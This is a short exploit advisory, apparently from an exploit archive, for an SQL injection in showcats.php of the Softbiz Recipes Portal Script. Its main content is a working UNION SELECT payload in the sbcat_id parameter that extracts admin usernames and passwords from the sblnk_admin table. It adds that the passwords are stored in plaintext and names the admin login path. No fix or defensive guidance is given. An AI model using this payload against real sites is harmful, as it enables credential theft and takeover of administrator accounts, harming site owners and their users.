id: 11082
date: 02/25/2010
title: Softbiz Recipes Portal Script (showcats.php) SQL Injection Vulnerability
author: Easy Laster
cves: 

========================================================================
Softbiz Recipes Portal Script (showcats.php) SQL Injection Vulnerability
========================================================================

----------------------------Information------------------------------------------------
+Name : Softbiz Recipes Portal Script SQL Injection showcats.php
+Autor : Easy Laster
+Date   : 25.02.2010
+Script  : Softbiz Recipes Portal Script
+Price : 99$
+Language : PHP
+Discovered by Easy Laster

----------------------------------------------------------------------------------------
+Vulnerability : www.site.com/auktionscript/showcats.php?sbcat_id=
+Exploitable   : http://server/showcats.php?sbcat_id=1+union+select+1,
concat(username,0x3a,password),3,4+from+sblnk_admin
 
 
The Password save in Plaintext you must login in www.site.com/auktionscript/admin/
-----------------------------------------------------------------------------------------



#  0day.today [2023-03-24]  #